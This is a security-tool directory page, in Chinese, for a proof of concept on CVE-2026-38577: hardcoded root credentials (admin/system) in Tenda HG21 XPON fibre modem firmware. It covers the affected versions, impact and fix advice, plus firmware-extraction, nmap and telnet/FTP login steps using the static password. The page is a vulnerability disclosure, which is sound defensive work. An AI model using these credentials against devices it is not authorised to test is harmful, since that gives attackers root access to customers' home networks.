Skip to content
KitploitKITPLOIT
工具博客
提交
工具博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
CVE-2026-38577-by-deepak-Anmol — 概念验证,演示腾达 HG21 XPON 调制解调器固件中硬编码的 root 凭据(admin/system),可通过 telnet 和 FTP 实现未经授权的 root 访问。 | Kitploit
工具/GitHubGitHub/poxsky/cve-2026-38577-by-deepak-anmol
嵌入式系统安全物联网安全漏洞分析漏洞利用渗透测试硬件与物联网安全固件分析
GitHubpoxsky/cve-2026-38577-by-deepak-anmol

CVE-2026-38577-by-deepak-Anmol

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
分享

概念验证,演示腾达 HG21 XPON 调制解调器固件中硬编码的 root 凭据(admin/system),可通过 telnet 和 FTP 实现未经授权的 root 访问。

查看仓库
9小时27分前尚未审核

CVE-2026-38577 — Tenda HG21 硬编码根凭据

摘要

字段值
CVE IDCVE-2026-38577
厂商Tenda
产品Tenda HG21 (XPON 光纤调制解调器)
受影响版本V4.0.0-260302
产品密钥HG21-V1.0-TDE01
硬件版本V1.0
固件构建日期2026-03-02
固件文件US_HG21re_300002982_en_xpon_2.zip
漏洞类别CWE-798:使用硬编码凭据
发现者Anmol Singh Rajput — 独立安全研究员
披露状态在 CVE 预留时尚未通知厂商 — 自 CVE 分配之日起适用 90 天负责任披露时限

描述

对 Tenda HG21 XPON 光纤调制解调器的固件分析发现,出厂固件镜像中内置了一个硬编码的管理员账户。该账户被授予完整的 root 权限(UID 0),且其凭据在所有设备上均为静态值,这意味着任何能够访问受影响设备上暴露的管理服务的攻击者,都可以在无需知道用户自行设置的 Web 界面密码的情况下,以 root 身份进行认证。

发现位置

  • 提取固件中的 /etc/passwd 包含一个 admin 条目,其 SHA256crypt 密码哈希对应静态值 system。
  • 该账户的 UID 为 0 — 即它就是 root,而非受限的服务账户。
  • 不存在 /etc/shadow,因此 passwd 中弱/静态的哈希是保护该账户的唯一屏障。
  • /etc/inetd.conf 启动了 telnetd 和 ftpd,两者均以 root 身份运行,因此该硬编码账户可通过网络访问,而不仅限于串口/UART 控制台。
  • Web 管理界面仅通过明文 HTTP 提供服务(无 TLS),这是另一个加固缺陷,但本身并非本 CVE 的内容。

影响

能够通过网络访问受影响设备 telnet(TCP/23)或 FTP(TCP/21)服务的攻击者,可以使用静态密码以 admin 身份登录,并获得 root shell / root 级文件访问权限。这至少允许:

  • 代码执行 — 通过 telnet 获得 root shell。
  • 权限提升 — 不存在权限边界;该账户一开始就是 root。
  • 信息泄露 — 完整的文件系统/配置访问权限,包括存储在设备上的任何客户网络凭据。

原始提交中的 CVSS 向量(厂商发布后评分可能有所不同):

  • 攻击向量:网络
  • 所需权限:无(凭据为硬编码/已知)
  • 用户交互:无
  • 机密性 / 完整性 / 可用性:高 / 高 / 高

概念验证

这是一个基于凭据的 PoC — 它演示了硬编码账户能够通过认证并获得 root 权限,而非内存破坏类漏洞利用。仅可针对您拥有或明确获授权测试的设备运行。

1. 确认固件中存在该凭据

root@kitploit:~
# 提取固件(使用 binwalk 或您选择的厂商工具)
binwalk -e US_HG21re_300002982_en_xpon_2.bin

# 定位并检查 passwd 文件
find . -name passwd
cat squashfs-root/etc/passwd
# -> admin:<sha256crypt-hash-of-"system">:0:0:root:/root:/bin/sh

2. 确认服务可达

root@kitploit:~
nmap -p 21,23 <target-ip>

3. 使用硬编码账户进行认证

root@kitploit:~
telnet <target-ip>
# login: admin
# password: system
root@kitploit:~
ftp <target-ip>
# Name: admin
# Password: system

在任一服务上成功登录后,将返回具有 root 权限的 shell/FTP 会话(id 将显示 uid=0(root))。

修复建议

  • 厂商应彻底移除硬编码的 admin/system 账户,或至少在首次启动时强制设置唯一的、每设备随机的密码(不能仅由序列号推导得出)。
  • 默认禁用 telnetd/ftpd;要求远程管理必须显式启用,并通过经过认证的加密通道(SSH/SFTP)进行。
  • 管理界面仅通过 HTTPS 提供服务。
  • 通过强制固件更新轮换已部署设备中的静态凭据,并在更新时强制重置密码。

时间线

日期事件
2026-03-02发布存在漏洞的固件版本
—在独立固件分析期间发现
2026-04-09通过 MITRE 预留 CVE-2026-38577
—厂商通知待定(自 CVE 分配起 90 天披露窗口)

致谢

发现并报告者:

  • Anmol Singh Rajput — LinkedIn
  • Deepak G — LinkedIn

参考

  • https://www.tenda.com.cn
  • https://cwe.mitre.org/data/definitions/798.html
下载工具